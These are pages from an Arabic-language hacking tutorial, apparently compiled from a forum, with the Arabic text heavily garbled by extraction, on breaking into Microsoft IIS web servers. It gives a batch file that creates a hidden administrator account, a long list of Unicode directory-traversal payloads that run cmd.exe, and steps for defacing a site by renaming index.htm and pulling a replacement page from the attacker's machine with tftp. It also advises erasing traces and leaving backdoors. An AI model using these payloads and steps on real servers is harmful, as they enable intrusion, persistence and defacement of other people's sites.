‫ـ ‪ Administrator‬ﻮﻟﻜﻨﻨﺎﻻ ﻧﻤﻠﻚﻛﻠﻤﺔاﻟﻤ ﺮور ‪ .‬ﻣﺎ رأﯾﻚﺑﺈ ﺿﺎﻓﻪ ﯾﻮزر ﺟﺪﯾﺪ‬ ‫ﺑﻤﺎاﻧﻨﺎﻟﺪﯾﻨﺎ ﺣﺴﺎب ﻣﻜﺎﻓﻲﻟ‬
‫ﺘﻔﻜﯿ ﺮ ‪(:‬‬
‫ﺘﯿﺎزا تاﻟﻤﺪﯾ ﺮاﯾ ﻀﺎ !! ‪(:‬ﻗﻠﯿ ﻞ ﻣﻦاﻟﺬﻛﺎ ء ﻮاﻟ‬‫ﺑﺎﺳﻤﻚ ﻣﻊﺑﺎﺳﻮرد ﺧﺎﺻﻪﺑﻚ ﻣﻊاﻣ‬
‫ﺘﺎﻟﻲ ‪:‬‬ ‫ﺘﻨﺪ ﻧﺼﻲ ﺟﺪﯾﺪ وا ﺿ ﻒاﻟﺴﻄ ﺮاﻟ‬ ‫ﻗﻢﺑﺎﻧﺸﺎ ء ﻣﺴ‬
‫‪net user Demon pass /add && net localgroup administrators Demon‬‬
‫‪/add‬ﻮاﻻن ‪ Save as‬ﻮا ﺣﻔﻈﻬﺎﺑﺎﺳﻢ‪add.bat .‬‬
‫ﺗﻮ ﺿﯿﺢ ‪ :‬ﻣﺎﻓﻌﻠﻨﺎه ﺳﺎﺑﻘﺎ ﻫﻮاﻧﺸﺎ ء ﻣﺠﻠﺪ دﻓﻌﺎﺗﻲ ﯾﻘﻮمﺑﺎﻧﺸﺎ ء ﯾﻮزر ﺟﺪﯾﺪ ‪ Demon‬ﻮﻛﻠﻤﺔ ﻣ ﺮور ‪Pass‬‬
‫ﺘﻮرز ‪ (:‬ﺎﻟﻤﺪرا ء ‪..‬‬
‫ﺘ ﺮﯾ‬
‫ﺘﻪاﻟﻰ ﻣﺠﻤﻮﻋﺔاﻻدﻣﻨﺴ‬ ‫ﻮا ﺿﺎﻓ‬
‫ﺘﺼﻔﺢ )ﺑﻮاﺳﻄﺔاﻟﯿﻮﻧﻜﻮد(‬ ‫ﻗﻢاﻻنﺑ ﺮﻓﻊاﻟﻤﻠ ﻒ ‪add.bat‬ﺛﻢﺗﺸﻐﯿﻠﻬﺎ ﻣﻦاﻟﻤ‬
‫ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لاﻟﻰاي ﺧﺪﻣﻪ ‪..‬ا فﺗﻲﺑﻲاوﺗﻠﻨ ﺖاو ﻧ ﺖﺑﯿﻮساو ﻏﯿ ﺮﻫﺎ ‪(:‬‬ ‫ﺎﻻنﻟﺪﯾﻚ ﺣﺴﺎب ﻣﺪﯾ ﺮ ‪ (:‬وﺗﺴ‬
‫ﺘﺴﻬﯿ ﻞاﻟﺪ ﺧﻮ لﻓﻲاﻟﻤ ﺮا تاﻟﻘﺎدﻣﻪ ‪(:‬‬ ‫ﺛﺎر وا ﺿﺎﻓﺔاﻻﺑﻮاباﻟﺨﻠﯿﺔاﻟﺨﺎ ﺻﺔﺑﻚﻟ‬ ‫ﻻﺗﻨﺴﻰﻓﻲاﻟﻨﻬﺎﯾﺔ ﻣﺴﺢاﻻ‬
‫ﺘ ﺤﻜﻢﻓﻲ‬ ‫ﻃﺒﻌﺎﻟﻦاﺗﻮﺳﻊﻓﻲﻫﺬااﻟﺠﺎﻧﺐ ﻻﻧﻪ )ﻟﻜ ﻞ ﺷﯿ ﺦ ﻃ ﺮﯾﻘﺔ!( وﻛ ﻞ وا ﺣﺪﻟﻪاﺳﻠﻮبﻓﻲا ﺧﻔﺎ ءادواﺗﻪ واﻟ‬
‫اﻟﻤﻠﻔﺎ ت ‪.‬‬

‫ﻧ ﺮﺟﻊﻟﻨﻘﻄﺔ ﺳﺎﺑﻘﺔ ‪..‬‬


‫ﻗﻔﺎ لاﻟﻔﺎﯾ ﺮوو ل ؟؟ﻟﻤﺎذا ؟‬‫ﻫ ﻞﺗﺬﻛ ﺮاﻧﻲ ﻃﻠﺒ ﺖ ﻣﻨﻚا‬
‫ﺘﺠﺪ ﻣﻦاﻟﻤﻨﺎﻓﺬ ﻣﺎ ﯾﺴ ﺮ ﺎﻟﻘﻠﺐ‬‫ﻟﻮ ﺟ ﺮﺑ ﺖﺗﻨﻔﺬاﻻﻣ ﺮ ‪ netstat -an‬ﻣﻦ ﺧﻼ ل ﺳﻄ ﺮاواﻣ ﺮاﻻن ﺳﻲ ‪..‬ﻓﺎﻧﻚ ﺳ‬
‫‪(:‬‬
‫ﺘﻮ ﺣﺎﺑﺪون‬ ‫ﺘﻬﺎ وﻛﺎﻧ ﺖ ﻣ ﺤﻤﯿﺔﺑﺠﺪران ﻧﺎر ‪ (:‬وﺟﺪ تاﻟﻤﻨﻔﺬ ‪139‬ﻓﯿﻬﺎ ﻣﻔ‬ ‫‪90%‬ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮا تاﻟﻠﻲ د ﺧﻠ‬
‫ﻗﻔﺎ لاﻟﻔﺎﯾ ﺮو لﻗﺪ ﯾﺠﻌ ﻞﻟﻚاﻛﺜ ﺮ ﻣﻦ ﺧﯿﺎر ﻻﺳﻘﺎطاﻟﻬﺪ ف ‪...(:‬‬ ‫ﺣﻤﺎﯾﻪ ‪(:‬ﻟﺬاﻓﺎنا‬

‫‪١ ٠٢‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

" ‫" ﻣﻌﻠﻮﻣﺎت ﻋﺎﻣﺔ ﻋﻦ ﻛﯿﻔﯿﺔ اﻻﺳﺘﻔﺎدة ﻣﻦ ﺛﻐﺮات اﻟﯿﻮﻧﯿﻜﻮد‬

$$$$$$$$$$$
‫ﺘﺮ‬‫ﺑﻼكﻫﻨ‬:‫اﻟﻜﺎﺗﺐ‬
$$$$$$$$$$$
‫ﺘﻄﻠﺒﺎ ت‬
‫ﺘ ﺤﻜﻢﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ ﻋﺒ ﺮاﻟﯿﻮﻧﯿﻜﻮد ﻣﻊﺑﻌ ﺾاﻟﻤ‬
‫ﺘﻜﻠﻢ ﻋﻦاﺳﺎﻟﯿﺐاﻟ‬
‫اﻟﻤﻮ ﺿﻮ ع ﯾ‬

: ‫اﻻدوا تاﻟﻤﻄﻠﻮﺑﻪ‬
‫(اداة ﻣﺴﺢﺛﻐ ﺮا ت ﯾﻮﻧﯿﻜﻮد‬١
TFTPD ‫(ﺑ ﺮﻧﺎﻣ ﺞ ﺳﯿ ﺮﻓ ﺮ‬٢
‫( ﻣﻌ ﺮﻓﺔ ﺟﯿﺪهﺑﺎﻟﯿﻮﻧﯿﻜﻮد‬٣
=================================================
‫ﻗﻌﻲ‬‫ﻗﻊاو ﻣﻦ ﻣﻮ‬ ‫(ﺑﺄﻣﻜﺎﻧﻚاﻟ ﺤﺼﻮ ل ﻋﻠﻰﺛﻐ ﺮا تاﻟﯿﻮﻧﯿﻜﻮد ﻣﻦاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻤﻮا‬١
(( ‫ﺘ ﺮ‬
‫ وﻫﺬه ﻣﻬﺪاه ﻣﻨﻲاﻧﺎ ))ﺑﻼك ﻫﻨ‬http://www .devil2k.com/
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/
cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+
c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sy
stem32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c
:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+
c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.ex
e?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/
cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+
dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/
cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/s
ystem32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.
exe?/c+dir+c:\

١ ٠٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c
md.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi
nnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/
c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm
d.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe
?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.
exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c
md.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi
nnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32
/cmd.exe?/c+dir+c:\
/cgi-
bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.
exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32
/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32
/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste
m32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.e
xe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.e
xe?/c+dir+c:\

١ ٠٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.
exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c
:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di
r+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+
dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system
32/cmd.exe\?/c+dir+c:\
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd
.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste
m32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:\

١ ٠٥
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste‬‬
‫\‪m32/cmd.exe?/c+dir+c:‬‬

‫ﻗﻊ ‪http://iisbughelp.4t.com/‬‬
‫‪(٢‬ﺑﺄﻣﻜﺎﻧﻚاﻟ ﺤﺼﻮ ل ﻋﻠﻰﺑ ﺮﻧﺎﻣ ﺞ ‪ TFTPD‬ﻣﻦاﻟﻤﻮ‬

‫ﺘﻘﺎ ل ﻋﺒ ﺮاﻟﻬﺎردﯾﺴﻜﺎ ت وﻋﺒ ﺮاﻟﻤﻠﻔﺎ ت‬


‫ﺘﻄﯿﻊاﻻﻧ‬ ‫‪ (٣‬ﻣﻌ ﺮﻓﺔاﻟﯿﻮﻧﯿﻜﻮدﺑﺴﯿﻄﻪ ﺟﺪا ﯾﻜﻔﻲانﺗﻌ ﺮ فﻛﯿ ﻒﺗﺴ‬
‫ﺘﺼﻔﺢ (‬‫)ﺗﻌﻤ ﻞ ﻋﺒ ﺮاﻟﻤ‬
‫‪/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+‬‬
‫\‪dir+C:‬‬
‫ﻟﻘ ﺮاﺋﻪ ﻣﺎﺑﺪا ﺧ ﻞﻫﺎردﯾﺴﻚ \‪C:‬‬
‫‪/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+‬‬
‫\‪dir+D:‬‬
‫ﻟﻘ ﺮاﺋﻪ ﻣﺎﺑﺪا ﺧ ﻞﻫﺎردﯾﺴﻚ \‪D:‬‬
‫‪/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+‬‬
‫\‪dir+E:‬‬
‫ﻟﻘ ﺮاﺋﻪ ﻣﺎﺑﺪا ﺧ ﻞﻫﺎردﯾﺴﻚ \‪E:‬‬
‫ﺘﺪأهﺑﺎﻟﻤﺠﻠﺪاﻟﻤﻄﻠﻮب ))‬ ‫ﻗﻊﻟﻨ ﺮى ﻣﺎﺑﻪ ﻣﻦﺛﻐ ﺮا ت وﻫﻨﺎ ﻣﺜﺎ ل ﻋﻠﻰﺛﻐ ﺮا ت ﻣﺒ‬ ‫ﻧﻘﻮمﺑﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﻤﻮ‬
‫اﻏﻠﺐﺛﻐ ﺮا تاﻟﯿﻮﻧﯿﻜﻮدﺗﻨﻄﻠ ﻖ ﻣﻦﻫﺬهاﻟﻤﺠﻠﺪا ت ((‬

‫‪(١‬ﻣﺜﺎ لاﻟﻤﺠﻠﺪ ‪msadc‬‬


‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di‬‬
‫\‪r+C:‬‬
‫‪ (٢‬ﻣﺜﺎ لاﻟﻤﺠﻠﺪ _‪vti_bin‬‬
‫‪/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+‬‬
‫\‪dir+C:‬‬
‫ﻓﻲ ﺳﯿ ﺮﻓ ﺮا ت ‪ IIS‬ﻋﻨﺪﺗ ﺮﻛﯿﺒﻬﺎ ))ﺑﺸﻜ ﻞ ﻋﺎدي (( ﯾﻜﻮناﻟﻤﺠﻠﺪاﻟ ﺮﺋﯿﺴﻲﻟﻠﻮﯾﺐﺗ ﺤ ﺖاﺳﻢ ﻣﻌﯿﻦ وﻫﻮ ‪:‬‬
‫‪C:\Inetpub\wwwroot‬‬
‫اوﻓﻲاﻟﻤﺠﻠﺪ‬
‫‪D:\Inetpub\wwwroot‬‬
‫اوﻓﻲاﻟﻤﺠﻠﺪ‬
‫‪E:\Inetpub\wwwroot‬‬
‫ﻓﻲاﻟﻌﺎده ﯾﻜﻮنﻓﻲاﻟﻬﺎردﯾﺴﻚ ‪ C‬وﻟﺬﻟﻚ ﺳﺄﻛﻤ ﻞ ﺷ ﺮ ﺣﻲ ﻋﻠﻰاﻧﻪﻫﻨﺎك‬
‫ﺘﻲ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ‬
‫ﻗﻊاﻟ‬‫ﺘﺠﺪﻓﻲ ﻫﺬااﻟﻤﺠﻠﺪ ﻋﺎدة ﺟﻤﯿﻊاﻟﻤﻮا‬ ‫ﺳ‬

‫ﺘﻜﻦ‬ ‫ﻓﻠﻮ وﺟﺪﻧﺎﺛﻐ ﺮة ﯾﻮﻧﯿﻜﻮد ﻣﺎ وﻟ‬


‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di‬‬
‫\‪r+c:‬‬
‫ﺘﺐاﻟﺜﻐ ﺮهﻫﻜﺬا ‪:‬‬
‫وأردﻧﺎاﻟﻮﻟﻮجاﻟﻰ ﻫﺬااﻟﻤﻠ ﻒﻟﻨ ﺮى ﻣﺎﺑﻪﻓﺴﻨﻜ‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di‬‬
‫‪r+C:\Inetpub\wwwroot‬‬

‫‪١ ٠٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ـ‬‫ﺘﺠﺪﻫﺎﻓﻲ ﻣﺠﻠﺪا تﺑﺪا ﺧ ﻞ ﻣﺠﻠﺪاﻟ‬‫ﻗﻊﺑﺎﺳﻤﻪ ) ﺳ‬ ‫ﺘﺠﺪﻫﺎﻛ ﻞ ﻣﻮ‬‫ﻗﻊﻓﺴ‬ ‫ﺎذاﻛﺎناﻟﺴﯿ ﺮﻓ ﺮ ﯾ ﺤﻮي ﻋﺪة ﻣﻮا‬
‫ـ‬
‫ﺘﺠﺪﻛﺎﻓﺔاﻟﻤﻠﻔﺎ تﻓﻲ ﻣﺠﻠﺪاﻟ‬ ‫ﻗﻊ وا ﺣﺪﻓﻘﻂﻓﺴ‬ ‫) ‪wwwroot‬اﻣﺎﻟﻮﻛﺎناﻟﺴﯿ ﺮﻓ ﺮ ﻋﺒﺎره ﻋﻦ ﻣﻮ‬
‫‪ wwwroot‬ﻧﻔﺴﻪ‬
‫ﺘﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪاﻻوﻟﻰ وﻋﻠﯿﻚانﺗﻌﻠﻢاﻧﻪﻟﯿ ﺲ داﺋﻤﺎاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪ‬ ‫ﻓﻲاﻏﻠﺐاﻟﻈﻦ ﯾﻘﻮماﻟﻬﺎﻛ ﺮﺑ‬
‫اﻻوﻟﻰﺗ ﺤﻤ ﻞاﺳﻢ ‪index.htm‬‬
‫ﺘﺼﺎرا تﻟﻬﺎ وﻫﺬهﺑﻌ ﻀﻬﺎ )) ﻣﻌﻈﻤﻬﺎ ((‬ ‫ﻫﻨﺎك ﻋﺪةﺗﺴﻤﯿﺎ ت وأ ﺧ‬
‫‪index.htm‬‬
‫‪index.asp‬‬
‫‪default.htm‬‬
‫‪default.asp‬‬
‫‪main.htm‬‬
‫‪main.asp‬‬

‫ﻗﻊﻓﻲ ﻣﺠﻠﺪﻧﺎ ‪ wwwroot‬ﻫﻲ ‪index.htm‬ﻓﻜﯿ ﻒ‬ ‫ﻟﻨﻔ ﺮ ضاﻻناﻧﻨﺎ وﺟﺪﻧﺎاناﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪﻟﻠﻤﻮ‬


‫ﺘﻐﯿﯿ ﺮاﺳﻢاﻟﻤﻠ ﻒ ﻣﻦ‬ ‫ﺘ ﺮا ق ﻫﺬه ﺳﻨﻘﻮماوﻻﺑ‬ ‫ﺘﻐﯿﯿ ﺮﻫﺎ وﻫﻮ ﻣﺎ ﯾﻬﻤﻨﺎﺗﻘ ﺮﯾﺒﺎ ﻣﻦ ﻋﻤﻠﯿﺔاﻻ ﺧ‬ ‫ﺳﻨﻘﻮمﺑ‬
‫‪index.htm‬اﻟﻰاياﺳﻢا ﺧ ﺮ ﯾﺨﻄ ﺮﺑﺒﺎﻟﻚ وﻟﯿﻜﻦ ‪ ss.htm‬ﻃﺒﻌﺎ ﺳﻨ ﺮﺳ ﻞاﻻﻣ ﺮ ﻋﺒ ﺮﺛﻐ ﺮةاﻟﯿﻮﻧﯿﻜﻮد ﻣﻦ‬
‫ﺘﻲ‬‫ﺘﻐﯿﯿ ﺮاﻟﺪاﻟﻪ ‪c+dir‬اﻟﻰاﻟﺪاﻟﻪ ‪ )) c+ren‬ﻋﻠﯿﻚانﺗﻌ ﺮ فاناﻻواﻣ ﺮاﻟ‬ ‫ﺘﺼﻔﺢﻟﺪﯾﻚ وﺳﻨﻘﻮمﺑ‬ ‫اﻟﻤ‬
‫ﺳﻮﺗ ﻀﻊ ﻫﻲ ﻧﻔ ﺲاﻻواﻣ ﺮاﻟﻤﻮﺟﻮدهﻓﻲ ‪ Dos‬وﻓﻲ ‪Command Prompt‬ﻓﻌﻠﯿﻚانﺗﻜﻮن ﻋﺎرﻓﺎﺑﻤﺎ‬
‫ﺘﺨﺪاﻣﻪ‬ ‫ﻫﻮاﻻﻣ ﺮاﻟﻤ ﺮاداﺳ‬
‫ﺘﺐاﻟﺜﻐ ﺮه ﻫﻜﺬا ‪:‬‬ ‫ﺘﻜ‬‫اﻟﻤﻬﻢ ﺳ‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+re‬‬
‫‪n+C:\Inetpub\wwwroot\index.htm+ss.htm‬‬
‫ﻮﻫﻜﺬاﻓﻘﺪﺗﻢﺗﻐﯿﯿ ﺮاﺳﻢاﻟﺼﻔ ﺤﺔ ﻣﻦ ‪index.htm‬اﻟﻰ ‪ss.htm‬‬
‫ﺘﻢﻛﻢﻫﻮ ﺳﻬ ﻞ ‪ (:‬؟‬ ‫ارأﯾ‬
‫ﻗﻊﻓﺎﻧ ﺖﺗ ﺮﯾﺪانﺗ ﻀﻊ ﺻﻔ ﺤﺔﺑﻤﻮ ﺿﻮ ع‬ ‫ﺘﻔﻲﺑﺎﻏﻼ قاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪﻟﻠﻤﻮ‬ ‫ﺘ ﺮ قﻟﻢﺗﻜ‬ ‫‪A‬ﯾﺒﺪواﻧﻚاﯾﻬﺎاﻟﻤﺨ‬
‫ا ﺧ ﺮ وﻟﯿﻜﻦاﻟﻤﻮ ﺿﻮ ع ﻫﻮ !!!‪ Hacked‬ﻓﻜﯿ ﻒ ﺳﻨ ﺮﺳﻠﻬﺎﻓﻲ ﺻﻔ ﺤﺔ ‪ index.htm‬؟؟‬
‫ﺘﻜﻮنﻓﯿﻪاﻧ ﺖﻓﻲ‬ ‫ﻫﻨﺎك ﻋﺪة ﻃ ﺮ ق وﻣﻨﻬﺎ ﺳﺄذﻛ ﺮ ﻫﺬهاﻟﻄ ﺮﯾﻘﻪ وﻫﻲ ﻋﺒ ﺮاﻻﺗﺼﺎ لﺑﻤﻨﻔﺬ ‪TFTP‬اﻟﺬي ﺳ‬
‫ﻗﻊاﻟﺬياﻣﺎﻣﻚ ﻓﻲ و ﺿﻊاﻟﻜﻼﯾﻨ ﺖ‬ ‫و ﺿﻊاﻟﺴﯿ ﺮﻓ ﺮ واﻟﻤﻮ‬
‫ﺘﻢ ﻫﺬا ؟‬ ‫ﻛﯿ ﻒ ﺳﯿ‬

‫ﺘ ﺮﻛﯿﺐ ﻧﻈﺎم ﺳﯿ ﺮﻓ ﺮ ‪ TFTP‬ﻋﻠﻰ ﺟﻬﺎزك )اﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻤﺬﻛﻮرﻓﻲاو لاﻟﻤﻮ ﺿﻮ ع ﻣﻦاﻓ ﻀ ﻞاﻟﺒ ﺮاﻣ ﺞ‬ ‫اوﻻﻗﻢﺑ‬
‫ﺘ ﺮاﻓﺎ وﻟﻜﻦ ﻫﺬا ﯾﻜﻔﻲ (‬
‫وﻫﻨﺎكﺑ ﺮﻧﺎﻣ ﺞا ﺧ ﺮاﻛﺜ ﺮا ﺣ‬
‫اﻻن ﺿﻊاﻟﺴﯿ ﺮﻓ ﺮاﻟ ﺮﺋﯿﺴﻲﻓﻲ \‪C:‬ﻟﺪﯾﻚ‬
‫ﺘﺼﻤﯿﻢ ﺻﻔ ﺤﺔ ﺧﻔﯿﻔﻪ وﺳ ﺮﯾﻌﻪ وﺳﻤﻬﺎ ‪ index.htm‬و ﺿﻌﻬﺎﻓﻲ \‪C:‬‬ ‫ﻗﻢﺑ‬
‫اﻻن ﻧ ﺮﯾﺪان ﻧ ﺮﺳ ﻞﻟﻠﺴﯿ ﺮﻓ ﺮاﻟﻤﻠ ﻒاﻟﺠﺪﯾﺪ ﻣﻦ \‪C:‬ﻟﺪﯾﻨﺎاﻟﻰ ﻣﻠ ﻒ ‪C:\inetpub\wwwroot‬‬
‫ﻻﻟﯿ ﺲاﻻﻣ ﺮ ﺻﻌﺒﺎﻓﻔﻲ ﻧﻈﻢ ﻣﯿﻜ ﺮوﺳﻮﻓ ﺖ ﯾﻮﺟﺪاﻣ ﺮ ))ﻫﻮﺑﺎﻷﺻﺢﺑ ﺮﻧﺎﻣﺠﺎ ﻣﻨﻔﺼﻼ (( ﯾ ﺤﻤ ﻞاﺳﻢ ‪TFTP‬‬
‫ﺘﺨﺪم ﺑ ﺮوﺗﻮﻛﻮ ل ‪ TFTP‬وﻫﻮﺑ ﺮوﺗﻮﻛﻮ لﺑﺴﯿﻂ ﺟﺪا ﺟﺪا )) ﯾﺴﻤﯿﻪاﻟﺒﻌ ﺾ‬ ‫وﻫﻮ ﻋﺒﺎره ﻋﻦﻛﻼﯾﻨ ﺖﺑﺴﯿﻂ ﯾﺴ‬
‫ﺘﺎﻓﻪ (( ﯾﻘﻮمﺑﺴ ﺤﺐاوارﺳﺎ لاﻟﻤﻠﻔﺎ ت ﻣﻦ واﻟﻰاﻟﺠﻬﺎز وﻧ ﺤﻦ ﻧ ﺮﯾﺪان ﯾﺴ ﺤﺐ ﻣﻠﻔﺎ ﻣﻦ ﺟﻬﺎزﻧﺎ‬ ‫اﻟﺒ ﺮوﺗﻮﻛﻮ لاﻟ‬
‫ﻓﻜﯿ ﻒﻟﻨﺎ ذﻟﻚ ؟‬
‫ﺘﺎﻟﻲ ‪:‬‬ ‫ﺘﺒﻨﺎﺗﻮﻟﯿﻔﺔاﻻﻣ ﺮاﻟ‬‫ﻃﺒﻌﺎﻟﻮﻛﻨﺎﻓﻲ ﻏﯿ ﺮاﻟﯿﻮﻧﯿﻜﻮدﻟﻜ‬
‫‪tftp.exe -i XXX.XXX.XXX.XXX get index.htm‬‬
‫‪C:\inetpub\wwwroot\index.htm‬‬

‫‪١ ٠٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫)) ‪XXX.XXX.XXX.XXX‬ﺗﻌﻨﻲايﺑﻲاﻟﺴﯿ ﺮﻓ ﺮاﻟﻤ ﺮاد ﺳ ﺤﺐاﻟﻤﻠ ﻒ ﻣﻨﻪ ((‬


